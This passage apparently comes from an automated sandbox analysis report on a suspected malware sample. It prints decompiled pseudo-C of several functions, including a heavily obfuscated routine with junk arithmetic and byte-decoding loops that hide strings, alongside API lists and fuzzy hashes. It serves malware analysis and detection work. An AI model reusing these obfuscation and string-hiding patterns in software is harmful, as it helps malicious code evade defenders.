				asm("int3");
				return 0;
			}






                                              0x00ec8c7b
                                              0x00ec8c7e
                                              0x00ec8d85
                                              0x00ec8d91
                                              0x00ec8da0
                                              0x00ec8da8
                                              0x00ec8db1
                                              0x00ec8dcb
                                              0x00ec8dce
                                              0x00ec8dd1
                                              0x00ec8dd9
                                              0x00ec8dd9
                                              0x00ec8de4
                                              0x00ec8ded
                                              0x00ec8df5
                                              0x00ec8dfd
                                              0x00ec8e02
                                              0x00ec8e02
                                              0x00ec8e08
                                              0x00ec8e0d
                                              0x00ec8e1f
                                              0x00ec8e25
                                              0x00ec8e2b
                                              0x00ec8e34

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.423883840.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                              • Associated: 00000000.00000002.423879545.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424170838.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424177261.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424207782.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ec0000_5GPueTFF2S.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6c666bec7b9497bf9f88caa2af10bf5479f004046de977aaae4c8493d75744cb
                                              • Instruction ID: cc9eb1fec3501256f55c5ff08d8fa4f2236846cc7096b7780f2d94c1b6cb050a
                                              • Opcode Fuzzy Hash: 6c666bec7b9497bf9f88caa2af10bf5479f004046de977aaae4c8493d75744cb
                                              • Instruction Fuzzy Hash: 001160709042188FC715CFA8E690FFDBBB1FB48350F14516EE885A7349DB3A1941CB14
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00ECA424 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1020 eca424-eca446 HeapCreate 1021 eca448-eca449 1020->1021 1022 eca44a-eca453 1020->1022
                                              C-Code - Quality: 100%
                                              			E00ECA424(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x10012b4 = _t6;
				if(_t6 != 0) {
					 *0x1215448 = 1;
					return 1;
				} else {
					return _t6;
				}
			}




                                              0x00eca439
                                              0x00eca43f
                                              0x00eca446
                                              0x00eca44d
                                              0x00eca453
                                              0x00eca449
                                              0x00eca449
                                              0x00eca449

                                              APIs
                                              • HeapCreate.KERNEL32(00000000,00001000,00000000,?,00EC8F13,00000001), ref: 00ECA439
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.423883840.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                              • Associated: 00000000.00000002.423879545.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424170838.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424177261.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424207782.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ec0000_5GPueTFF2S.jbxd
                                              Similarity
                                              • API ID: CreateHeap
                                              • String ID:
                                              • API String ID: 10892065-0
                                              • Opcode ID: 595c1c28ddefa2f623b5a76587b88e922c798f91ed187dadd2e9c9bf4e6cab9b
                                              • Instruction ID: e4a404134e44011376e4b389f73db0383a022899e4df9ffb04ee9009c6d4affb
                                              • Opcode Fuzzy Hash: 595c1c28ddefa2f623b5a76587b88e922c798f91ed187dadd2e9c9bf4e6cab9b
                                              • Instruction Fuzzy Hash: B6D05E72A943499AEB209F707D48B623BDCE784399F144439B90DC6140EAB5D550D601
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00EC9EF9 Relevance: 1.5, APIs: 1, Instructions: 4COMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1023 ec9ef9-ec9efb call ec9e87 1025 ec9f00-ec9f01 1023->1025
                                              C-Code - Quality: 100%
                                              			E00EC9EF9() {
				void* _t1;

				_t1 = E00EC9E87(0); // executed
				return _t1;
			}




                                              0x00ec9efb
                                              0x00ec9f01

                                              APIs
                                              • __encode_pointer.LIBCMT ref: 00EC9EFB
                                                • Part of subcall function 00EC9E87: TlsGetValue.KERNEL32(00000000,?,00EC9F00,00000000,00ECBB0C,01000D80,00000000,00000314,?,00EC9691,01000D80,Microsoft Visual C++ Runtime Library,00012010), ref: 00EC9E99
                                                • Part of subcall function 00EC9E87: TlsGetValue.KERNEL32(00000004,?,00EC9F00,00000000,00ECBB0C,01000D80,00000000,00000314,?,00EC9691,01000D80,Microsoft Visual C++ Runtime Library,00012010), ref: 00EC9EB0
                                                • Part of subcall function 00EC9E87: RtlEncodePointer.NTDLL(00000000,?,00EC9F00,00000000,00ECBB0C,01000D80,00000000,00000314,?,00EC9691,01000D80,Microsoft Visual C++ Runtime Library,00012010), ref: 00EC9EEE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.423883840.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                              • Associated: 00000000.00000002.423879545.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424170838.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424177261.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424207782.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ec0000_5GPueTFF2S.jbxd
                                              Similarity
                                              • API ID: Value$EncodePointer__encode_pointer
                                              • String ID:
                                              • API String ID: 2585649348-0
                                              • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                              • Instruction ID: 2e64200c3214d121a52a2a5cdd84dd97e81524d16f2194890ae293455c0a632c
                                              • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                              • Instruction Fuzzy Hash:
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Function 00EC6091 Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 617COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 84%
                                              			E00EC6091(void* __eax, signed int __ebx) {
				signed int _t323;
				signed char _t328;
				signed short _t329;
				signed int _t334;
				signed short _t359;
				signed short _t360;
				intOrPtr _t371;
				signed int _t372;
				void* _t380;
				signed int _t392;
				signed int _t393;
				signed int _t395;
				signed int _t398;
				signed short _t401;
				signed int _t405;
				signed int _t411;
				intOrPtr _t412;
				signed int _t413;
				signed int _t415;
				signed int _t418;
				signed short _t419;
				void* _t421;
				void* _t424;
				void* _t430;
				WCHAR* _t433;
				signed char _t439;
				signed short _t447;
				signed short _t463;
				signed int _t473;
				signed int _t479;
				signed int _t481;
				signed short _t482;
				signed int _t488;
				signed int _t512;
				signed int _t538;
				signed short _t547;
				signed int _t549;
				signed int _t579;
				intOrPtr _t583;
				signed int _t585;
				signed int _t598;
				signed int _t602;
				signed int _t611;
				signed int _t613;
				signed int _t615;
				signed int _t630;
				signed int _t632;
				signed int _t634;
				signed int _t639;
				signed short _t640;
				signed int _t662;
				signed int _t674;
				signed int _t677;
				char _t686;
				signed int _t690;
				signed int _t699;
				signed int _t705;
				signed int _t706;
				signed int _t721;
				signed int _t723;
				signed int _t727;
				intOrPtr _t732;
				signed int _t733;
				signed int _t734;
				signed short _t737;
				signed int _t745;
				signed int _t749;
				signed int _t751;
				signed int _t754;
				signed int _t760;
				signed int _t771;
				WCHAR* _t772;
				signed int _t780;
				signed int _t781;
				signed int _t791;
				signed int _t802;
				signed int _t805;
				signed int _t806;
				signed int _t809;
				signed int _t836;
				signed int _t851;
				signed int _t855;
				intOrPtr _t861;
				signed int _t863;
				signed int _t864;
				signed int _t865;
				void* _t870;
				void* _t876;
				void* _t877;
				signed int _t882;
				void* _t889;
				void* _t890;
				void* _t891;
				void* _t911;

				_t538 = __ebx;
				asm("scasb");
				_t699 =  *0x1215420;
				 *(_t870 - 0x20) = _t699;
				 *(_t870 - 0xb4) =  *(_t870 - 0x20) + 0x276;
				if( *0x1000c9b != 0 || ( *0x1000c83 & 0x000000ff) >  *(_t870 - 0x90)) {
					__eflags =  *(_t870 - 0xc) -  *(_t870 - 5);
					if( *(_t870 - 0xc) <=  *(_t870 - 5)) {
						_t547 = 0;
						__eflags = 0;
					} else {
						_t547 = 1;
					}
					asm("cdq");
					asm("adc edx, [0x1000d14]");
					__eflags = ( *0x1000c98 & 0x0000ffff) +  *0x1000d10 - _t547;
					if(( *0x1000c98 & 0x0000ffff) +  *0x1000d10 != _t547) {
						L11:
						_t323 = 0;
						__eflags = 0;
					} else {
						__eflags = _t699;
						if(_t699 != 0) {
							goto L11;
						} else {
							_t323 = 1;
						}
					}
					__eflags =  *0x1000cf8 - _t538;
					 *(_t870 - 0xa8) = _t538;
					_t549 = 0 |  *0x1000cf8 == _t538;
					__eflags = _t549 -  *(_t870 - 0x28);
					asm("sbb ecx, ecx");
					__eflags = ( *(_t870 - 3) & 0x000000ff) - _t549 + 1;
					__eflags = _t323 - (0 | ( *(_t870 - 3) & 0x000000ff) - _t549 + 0x00000001 < 0x00000000);
					_t538 =  *(_t870 - 0xa8);
					if(__eflags != 0) {
						__eflags =  *(_t870 - 0x8c);
						_t705 =  *(_t870 - 0x8c) - (0 |  *(_t870 - 0x8c) == 0x00000000);
						__eflags = _t705;
						if(__eflags != 0) {
							 *0x1000ca0 =  *0x1215420;
							asm("cdq");
							 *0x1000cbc = _t705;
							_t705 =  *0x1000ce8;
							_t690 = ( *(_t870 - 0xe) & 0x000000ff) * _t705;
							__eflags = _t690;
							 *0x1000cb8 =  *0x1000c9a - 0x20f4;
							 *(_t870 - 0xe) = _t690;
						}
					} else {
						 *(_t870 - 0x18) =  *0x1000ca4 - ( *(_t870 - 0xb) & 0xff);
						asm("cdq");
						 *0x1000cf0 =  *0x1000cf0 - ( *(_t870 - 9) & 0x000000ff);
						asm("sbb [0x1000cf4], edx");
						_t705 =  *(_t870 - 0x64);
						 *0x1000c94 =  *(_t870 - 0x68) + 0xbfc4;
						 *(_t870 - 0x6c) = ( *(_t870 - 0xa) & 0xff) * 0x9564;
					}
				} else {
					 *(_t870 - 0x28) =  *0x1000cd2 + 0xd71b;
					 *(_t870 - 0x24) =  *(_t870 - 0x24) - 1;
					 *(_t870 - 0xb) = ( *(_t870 - 0xb) & 0x000000ff) +  *0x1000c9e - ( *(_t870 - 0xb) & 0xff);
					_t705 = ( *(_t870 - 5) & 0x000000ff) + ( *(_t870 - 5) & 0x000000ff &  *0x1000cd8);
					 *(_t870 - 5) = _t705;
				}
				 *(_t870 - 0xac) =  *(_t870 - 0x20) + 0x2e4;
				_t328 =  *(_t870 - 1);
				asm("cdq");
				_t876 = _t328 -  *0x1000d10; // 0x0
				if(_t876 != 0) {
					L18:
					_t329 = 1;
				} else {
					_t877 = _t705 -  *0x1000d14; // 0x0
					if(_t877 == 0) {
						_t329 = 0;
						__eflags = 0;
					} else {
						goto L18;
					}
				}
				_t706 =  *(_t870 - 1);
				if(_t329 > (0 | _t706 != 0x00000030)) {
					asm("cdq");
					asm("sbb esi, edx");
					asm("cdq");
					__eflags =  *0x1000d10 - ( *(_t870 - 0x18) & 0x0000ffff) |  *0x1000c84 |  *0x1000d14 | _t706;
					if(__eflags != 0) {
						 *(_t870 - 0x1c) =  *(_t870 - 0x38) *  *(_t870 - 0x1c);
						 *(_t870 - 0x28) = 0x3090bb2d;
						_t836 =  *(_t870 - 1) + 0x23;
						__eflags = _t836;
						 *0x1000c9a = _t836;
						 *(_t870 - 0x40) = E00ECEE50( *(_t870 - 0x38),  *(_t870 - 0x34), 0x7d, _t538);
						 *(_t870 - 0x3c) = _t836;
					}
				} else {
					 *0x1000c9f = TlsGetValue( *(_t870 - 0x60));
				}
				 *(_t870 - 0xb8) =  *(_t870 - 0x20) + 0x2bc;
				 *(_t870 - 0x20) =  *0x1215420;
				 *0x1000cd0 = 0xfffff41d;
				 *0x1000cd8 = (1 -  *0x1000d18) *  *0x1000cd8;
				_t334 =  *0x1000cb8; // 0x4
				 *0x1000c94 =  *(_t870 - 0x38) * 0xdcf2d26f;
				 *(_t870 - 0x90) = _t334 & 0x00000006;
				 *(_t870 - 0x14) =  *(_t870 - 0x20) + 0x3b1;
				if( *(_t870 - 0x7c) == 0) {
					__eflags =  *0x1000ca8 |  *0x1000cac;
					if(__eflags != 0) {
						__eflags =  !( *0x1000d10) |  !( *0x1000d14);
						if(__eflags != 0) {
							 *0x1000ca4 =  *0x1000ca4 - 1;
							asm("adc ecx, [0x1000cbc]");
							 *(_t870 - 0x38) =  *(_t870 - 0x38) +  *0x1000cb8 + 0xd0056b0c;
							asm("adc ecx, 0xfff005d1");
							asm("adc eax, 0xfff765fd");
							 *0x1000ce4 =  *0x1000d04;
							 *0x1000ce0 =  *0x1000d00 + 0x1e29880a;
							asm("cdq");
							 *(_t870 - 0x38) =  *(_t870 - 0x38) -  *(_t870 - 1) + 0x10;
							asm("sbb [ebp-0x34], edx");
							_t674 = ( *(_t870 - 0xa0) +  *(_t870 - 0x18) + 2) * 0x6a +  *0x1000c98 * 0x41;
							__eflags = _t674;
							 *0x1000c83 = _t674;
						}
					} else {
						 *0x1000ca4 = ( *(_t870 - 0x68) +  *0x1000ca4) *  *0x1000ca4;
						 *(_t870 - 0x30) =  *(_t870 - 0x30) -  *(_t870 - 0x40);
						 *(_t870 - 0x24) =  *0x1000c84 + 0x6491;
					}
				} else {
					if( *(_t870 - 0x6c) != 0) {
						_t512 =  *0x1000ce0; // 0x0
						_t677 =  *0x1000ce4; // 0x0
						_t882 = _t512 ^  *0x1000d18 | _t677 ^  *0x1000d1c;
						if(_t882 == 0) {
							 *0x1000c84 = 0x78;
							 *0x1000cc8 =  *0x1000ca8 & 0x430b161a;
							 *0x1000ccc = _t538;
							 *(_t870 - 3) =  *0x1215420;
							 *(_t870 - 0x70) =  *0x1000cb4 << 4;
						} else {
							 *0x1000c88 =  *0x1000c9f + 0x60ad17c2 ^  *0x1000c94;
							_t686 =  *0x1000c9c; // -44
							 *0x1000c8c = _t538;
							 *((char*)(_t870 - 4)) =  *(_t870 - 0xd) & 0xffffff00 | _t882 == 0x00000000;
							 *(_t870 - 0x4c) = ( *0x1000c98 & 0x0000ffff) + 0x73bfbdfe;
							 *0x113d808 = _t686;
						}
					}
				}
				 *((intOrPtr*)(_t870 - 0xa4)) =  *(_t870 - 0x20) + 0x241;
				 *(_t870 - 0xc4) =  *(_t870 - 0x20) + 0x273;
				 *(_t870 - 0x20) =  *0x1215420;
				 *(_t870 - 6) = E00EC1000();
				asm("sbb ecx, ecx");
				asm("sbb edx, edx");
				if(( *(_t870 - 6) & 0x000000ff) + 1 >  *((intOrPtr*)(_t870 - 4)) + 1) {
					asm("cdq");
					 *0x1000ce0 =  *0x1000ce0;
					asm("sbb [0x1000ce4], edx");
					 *(_t870 - 0x18) =  *(_t870 - 0x70) - 0x23c803e3;
					 *(_t870 - 0x28) =  *0x1215420;
					 *0x1000cd2 = 0 - ( *(_t870 - 0xa0) ^ 0);
					 *0x1000cd8 = ( *(_t870 - 8) & 0xff) +  *(_t870 - 0x6c) + 1;
				}
				 *(_t870 - 0xa8) =  *(_t870 - 0x20) + 0x83;
				_t887 =  *(_t870 - 0xa0) |  *(_t870 - 0x9c);
				if(( *(_t870 - 0xa0) |  *(_t870 - 0x9c)) == 0) {
					asm("sbb eax, eax");
					asm("cdq");
					_t721 =  *(_t870 - 0x30) & 0x0000ffff;
					asm("cdq");
					asm("sbb edx, ebx");
					 *0x1000d18 = E00ECEE50(( ~( *(_t870 - 0x28)) + 1) * ( *(_t870 - 0x1c) & 0x0000ffff),  *(_t870 - 0x1c) & 0x0000ffff, _t721 -  *(_t870 - 0x48), _t721);
					 *0x1000d1c = _t721;
					 *0x1000cd8 = ( *0x1000c9b & 0x000000ff) - 0x23e5;
					_t538 = 0;
					__eflags = 0;
				} else {
					 *(_t870 - 0x4c) = E00EC1370(_t887) & 0x000000ff;
					_t806 =  *(_t870 - 0x4c);
					if(_t806 <= 0) {
						_t479 =  *0x1000cac; // 0x106b42
						_t889 = _t479 -  *0x1000c8c; // 0xfff500a5
						if(_t889 > 0) {
							L41:
							_t481 =  *(_t870 - 0xa) & 0x000000ff;
							asm("cdq");
							__eflags = _t806 -  *0x1000d14;
							if(__eflags < 0) {
								L45:
								_t482 = 0;
								__eflags = 0;
							} else {
								if(__eflags > 0) {
									L44:
									_t482 = 1;
								} else {
									__eflags = _t481 -  *0x1000d10;
									if(_t481 <=  *0x1000d10) {
										goto L45;
									} else {
										goto L44;
									}
								}
							}
							 *(_t870 - 8) =  *0x1000c90 - ( *(_t870 - 8) == 0);
							__eflags = _t482 - ( *0x1000c90 ==  *(_t870 - 8) == 0);
							if(_t482 <= ( *0x1000c90 ==  *(_t870 - 8) == 0)) {
								_t809 =  *0x1215420;
								 *(_t870 - 0x80) = _t809;
								asm("cdq");
								asm("cdq");
								_t488 = E00ECEE50(E00ECEE50( *(_t870 - 0x24), _t809, ( *0x1000cd4 & 0x0000ffff) + 0x43, _t809), _t809,  *0x1000d18,  *0x1000d1c);
								 *0x1000ce4 = _t809;
								 *0x1000ce0 = _t488;
								 *(_t870 - 0x88) = (( *(_t870 - 3) & 0x000000ff) - ( *(_t870 - 6) & 0x000000ff)) *  *0x1000d18;
								 *(_t870 - 0x2c) = ( *(_t870 - 0x84) & 0x0000ffff) - 0x86;
							}
						} else {
							if(_t889 < 0) {
								L40:
								 *(_t870 - 2) =  *(_t870 - 0x80) - 0x6b;
							} else {
								_t662 =  *0x1000ca8; // 0x7b8b5249
								_t890 = _t662 -  *0x1000c88; // 0xa666078f
								if(_t890 > 0) {
									goto L41;
								} else {
									goto L40;
								}
							}
						}
					}
				}
				_t723 =  *(_t870 - 0x20) + 0x373;
				 *(_t870 - 0xb8) = _t723;
				_t861 =  *((intOrPtr*)(_t870 - 0x58));
				_t359 =  *(_t870 - 0x30);
				asm("cdq");
				_t891 = _t723 -  *((intOrPtr*)(_t870 - 0x54));
				if(_t891 > 0 || _t891 >= 0 && _t359 > _t861) {
					_t360 = 0;
					__eflags = 0;
				} else {
					_t360 = 1;
				}
				_t725 = 0 |  *(_t870 - 0x30) - 0x00000054 <= 0x00000000;
				if(_t360 <  *(_t870 - 0x30) - 0x54 <= 0) {
					 *(_t870 - 9) =  *0x1000cd0;
					 *0x1000ca4 =  *0x1000cb4;
				} else {
					asm("cdq");
					 *(_t870 - 0x48) =  *(_t870 - 0x48) - E00ECEE50( *(_t870 - 0x48),  *((intOrPtr*)(_t870 - 0x44)),  *0x1000c9c, _t725);
					asm("sbb [ebp-0x44], edx");
					 *(_t870 - 0xc) = 0x53;
					_t805 =  *(_t870 - 0x24);
					asm("cdq");
					 *0x1000cc0 = _t805 - 0xff34;
					asm("ror byte [eax+eax], 0x1");
					 *0x1000cc4 = _t805;
				}
				_t727 =  *(_t870 - 0x20) + 0x117;
				 *(_t870 - 0xb8) = _t727;
				 *0x1000ca4 = E00EC1700();
				asm("cdq");
				asm("adc edx, 0xcae43");
				if(( !( *0x1000c9f) + 0x0dc8da25 | _t727) != 0) {
				}
				if( *(_t870 - 0xa8) != 0x3b0) {
					 *(_t870 - 0x6c) =  *(_t870 - 0x6c) &  *0x1109ef0;
					 *(_t870 - 0x88) =  *(_t870 - 0x88) -  *(_t870 - 0x78) &  *(_t870 - 0x88);
					 *((char*)(_t870 - 0xfc)) = 0x97;
					 *((char*)(_t870 - 0xfb)) = 0xaf;
					 *((char*)(_t870 - 0xfa)) = 0xb7;
					 *((char*)(_t870 - 0xf9)) = 0xb9;
					 *((char*)(_t870 - 0xf8)) = 0xbc;
					 *((char*)(_t870 - 0xf7)) = 0xc3;
					 *((char*)(_t870 - 0xf6)) = 0x6a;
					 *((char*)(_t870 - 0xf5)) = 0xb0;
					 *((char*)(_t870 - 0xf4)) = 0xab;
					 *((char*)(_t870 - 0xf3)) = 0xbf;
					 *((char*)(_t870 - 0xf2)) = 0xb6;
					 *((char*)(_t870 - 0xf1)) = 0xbe;
					_t863 = 0;
					do {
						_t579 =  *0x1000cc0; // 0xffff970a
						if((_t579 |  *0x1000cc4) == 0) {
							_t732 =  *((intOrPtr*)(_t870 - 7));
							_t371 = _t732;
							asm("cdq");
							__eflags =  *0x1000cbc - _t732;
							if(__eflags < 0) {
								L70:
								_t372 = 0;
								__eflags = 0;
							} else {
								if(__eflags > 0) {
									L69:
									_t372 = 1;
								} else {
									__eflags =  *0x1000cb8 - _t371;
									if( *0x1000cb8 <= _t371) {
										goto L70;
									} else {
										goto L69;
									}
								}
							}
							__eflags =  !_t372;
							if( !_t372 == 0) {
								__eflags =  *0x1000ce0 |  *0x1000ce4;
								if(( *0x1000ce0 |  *0x1000ce4) != 0) {
									_t802 =  *(_t870 - 0x70) &  *0x1000ce0;
									 *0x1000ce0 = E00ECEE50(_t802, 0 &  *0x1000ce4,  *0x1000ce0,  *0x1000ce4);
									 *0x1000ce4 = _t802;
									 *0x1000cd8 =  *(_t870 - 0x40) * 0xffffe4ed;
									_t473 =  *0x1000d20 & 0xffffb755;
									__eflags = _t473;
									 *(_t870 - 0x5c) = _t473;
								}
							} else {
								 *0x1000c84 =  *0x1000c84 + 1;
							}
						} else {
							 *0x1000c84 = 0x9b;
							 *(_t870 - 8) = 1;
						}
						_t733 =  *0x1000d08;
						_t583 =  *0x1000cf4; // 0x2b91c
						asm("cdq");
						_t734 =  *0x1000cf0; // 0xd43579fe
						 *(_t870 - 0xa8) = _t733;
						_t380 = E00ECEE50(_t734, _t583, 0x1faed387, _t538);
						asm("sbb edx, edi");
						_t538 = 0;
						 *0x1000cf4 = 0;
						 *0x1000cf0 = 1;
						if((_t380 -  !( *(_t870 - 2) ^ _t733) | _t734) != 0) {
							 *0x1000cf0 = 0;
						}
						_t585 =  *0x1000ca4; // 0x9b27
						 *0x1000c90 = 0xb8f675f1 - ( *(_t870 - 1) & 0x000000ff);
						_t737 =  *0x1000cdc; // 0x84521e70
						_t863 = _t863 + 1;
						 *0x1000d10 = ( *(_t870 - 1) & 0x000000ff) *  *(_t870 - 0x6c) * ( *0x1000d08 - (0 | ( *(_t870 - 0x24) & 0x0000ffff) == 0x00000000)) * ((( *0x1000c83 & 0x000000ff) + 1) *  *0x1000cb4 +  !(_t585 + _t737));
						 *(_t870 + _t863 * 2 - 0x1ae) = ( *(_t870 + _t863 - 0xfd) & 0x000000ff) - 0x0000004a & 0x000000ff;
						 *0x1000d14 = _t538;
					} while (_t863 < 0xc);
					_t745 = 0x92 - ( *(_t870 - 0xac) ^  *(_t870 - 0xb4));
					_t392 = M01000CB0; // 0x0
					 *(_t870 - 0x194) = _t745;
					 *0x1000cc0 = 2;
					 *0x1000cc4 = _t538;
					_t393 = E00ECEE50(_t392, _t538, 0xbe790e28, 0x61b36);
					 *0x1000d1c = _t745;
					 *0x1000d18 = _t393;
					_t395 =  *0x1000cc0; // 0xffff970a
					_t598 =  *0x1000cc4; // 0xffffffff
					 *0x1000c94 =  *(_t870 - 0x1c) +  *(_t870 - 1) + 1;
					_t749 = _t395 | _t598;
					if(_t749 == 0) {
						_t751 = 1 -  *(_t870 - 0x78);
						asm("sbb eax, ecx");
						_t398 = E00ECEE50(_t751, 0,  *0x1000ca8,  *0x1000cac);
						 *0x1000cac = _t751;
						_t749 =  *0x1000c83 & 0x000000ff;
						M01000CB0 = M01000CB0 ^ _t749;
						__eflags = M01000CB0;
						 *0x1000ca8 = _t398;
					} else {
						if(_t395 != 1 || _t598 != _t538) {
							if(_t395 == 2 && _t598 == _t538) {
								 *(_t870 - 0xbc) = _t538;
								if( *(_t870 - 0x24) != 0) {
									_t640 = 0;
									__eflags = 0;
								} else {
									_t640 = 1;
								}
								 *(_t870 - 0xbc) = _t538;
								if( *(_t870 - 0xb) != 0) {
									_t463 = 0;
									__eflags = 0;
								} else {
									_t463 = 1;
								}
								 *(_t870 - 0x18) = ( *(_t870 - 0x78) - _t640) *  *0x1000d10 * _t463;
								asm("cdq");
								asm("sbb esi, edx");
								_t749 =  *(_t870 - 0x48);
								asm("sbb esi, eax");
								 *(_t870 - 0x48) =  *(_t870 - 0x48) -  *((intOrPtr*)(_t870 - 7)) - _t749;
							}
						} else {
							 *0x1000d18 =  *0x1215420;
							 *0x1000d1c = _t538;
							 *(_t870 - 2) =  *(_t870 - 2) & 0x000000ff &  *(_t870 - 0x80) & 0x0000ffff |  *(_t870 - 2) & 0x000000ff;
							_t749 =  *0x10ae26c;
							 *0x1000d20 =  *0x1000d20 | _t749;
						}
					}
					 *((char*)(_t870 - 0xdc)) = 0xe5;
					 *((char*)(_t870 - 0xdb)) = 0xdd;
					 *((char*)(_t870 - 0xda)) = 0xe5;
					 *((char*)(_t870 - 0xd9)) = 0xe7;
					 *((char*)(_t870 - 0xd8)) = 0xea;
					 *((char*)(_t870 - 0xd7)) = 0xf1;
					_t401 = E00EC1190() & 0x000000ff;
					 *0x1000cd8 = _t401;
					if(_t401 > _t538) {
						asm("cdq");
						 *0x1000d1c = _t538;
						asm("adc edx, [0x1000cbc]");
						 *0x1000cc0 =  !(( *0x1000c83 & 0x000000ff) +  *0x1000cb8);
						 *0x1000cc4 =  !_t749;
						 *0x1000d18 =  *0x1215420;
						 *((intOrPtr*)(_t870 - 0x58)) =  *((intOrPtr*)(_t870 - 0x58)) + 1;
						asm("adc [ebp-0x54], ebx");
					}
					_t602 =  *(_t870 - 0x40);
					 *(_t870 - 0x38) = _t602 + _t602 + _t602 + _t602 + _t602 + _t602 + _t602 + _t602;
					 *(_t870 - 0x34) = ( *(_t870 - 0x3c) << 0x00000020 | _t602) << 3;
					 *0x10ae368 =  *(_t870 - 0x38);
					_t864 = 0;
					do {
						_t754 =  *(_t870 - 0xb);
						_t911 =  *0x1000c9b - _t754; // -28
						if(_t911 >= 0) {
							if( *(_t870 - 1) == 0) {
								_t405 =  *(_t870 - 0x6c);
								_t851 =  *(_t870 - 0x34);
								asm("cdq");
								__eflags = _t405 -  *(_t870 - 0x38);
								if(_t405 !=  *(_t870 - 0x38)) {
									L100:
									 *(_t870 - 0x90) =  *(_t870 - 0x40) +  *0x1000d10 +  *0x1000c84 -  *(_t870 - 1);
									 *(_t870 - 0x2c) =  *(_t870 - 0x2c) - ( *(_t870 - 0x2c) &  *0x1000cf0 & 0x0000ffff);
									 *0x1000ca0 =  *0x1000ca0 +  *(_t870 - 0x7c);
									 *0x1000c9e =  *0x1215420;
									 *0x1000c88 =  *0x1000c88 -  *(_t870 - 0x40);
									asm("sbb [0x1000c8c], eax");
								} else {
									__eflags = _t754 - _t851;
									if(_t754 == _t851) {
										_t632 =  *0x1000c88 |  *0x1000c8c;
										__eflags = _t632;
										 *_t632 =  *_t632 + _t405;
										__eflags =  *_t632;
										if( *_t632 != 0) {
											_t855 =  *(_t870 - 0x74);
											_t411 =  *0x1000c83 & 0x000000ff;
											asm("cdq");
											_t634 =  *(_t870 - 0x78) - _t411;
											__eflags = _t634;
											asm("enter 0xfa1b, 0x8b");
											_push(_t870);
											 *0x3DE8FE44 = _t634;
											 *(_t870 - 0x78) = _t634;
											 *(_t870 - 0x74) = _t855 & _t411;
											 *(_t870 - 0xa) = ( *(_t870 - 0xa) & 0x000000ff) + ( *(_t870 - 0x18) & 0x0000ffff);
											_t412 =  *((intOrPtr*)(_t870 - 4));
											 *0x1000cf0 = 0x73c571ff;
											_t639 = _t412 +  *0x1000cc8 + 1;
											__eflags = _t639;
											 *0x1000cd4 = _t639;
											 *0x1000cf4 = 0;
											_t413 = _t412 + 0x1000cf4;
											__eflags = _t413;
											 *_t639 =  *_t639 + _t413;
											 *_t413 =  *_t413 + _t413;
											 *_t413 =  *_t413 + _t413;
											__eflags =  *_t413;
										}
									} else {
										goto L100;
									}
								}
							} else {
								_t630 =  *0x1000d04; // 0xffffffff
								asm("cdq");
								_t415 =  *0x1000d00; // 0xfffff835
								_t791 = _t754 & _t630;
								 *0x1000d00 = E00ECEE50( *(_t870 - 0x1c) & _t415, _t791, _t415, _t630);
								 *0x1000d04 = _t791;
							}
						}
						 *(_t870 + _t864 * 2 - 0x160) = ( *(_t870 + _t864 - 0xdc) & 0x000000ff) + 0x00000068 & 0x000000ff;
						_t864 = _t864 + 1;
					} while (_t864 < 6);
					_t611 =  *0x1000d00; // 0xfffff835
					 *0x1000ce0 = 2;
					 *0x1000ce4 = 0;
					 *(_t870 - 0x70) = _t611 * 0x6eb594ba;
					_t613 =  *0x1000ce4; // 0x0
					 *0x110030c =  *(_t870 - 0x60);
					_t418 =  *0x1000ce0; // 0x0
					_t760 = _t418 | _t613;
					if(_t760 == 0) {
						 *(_t870 - 0xbc) = 0;
						__eflags =  *(_t870 - 6);
						if( *(_t870 - 6) != 0) {
							_t419 = 0;
							__eflags = 0;
						} else {
							_t419 = 1;
						}
						_t615 =  *0x1000d00 + _t419;
						__eflags = _t615;
						 *(_t870 - 0x24) =  !_t615;
					} else {
						if(_t418 != 1 || _t613 != 0) {
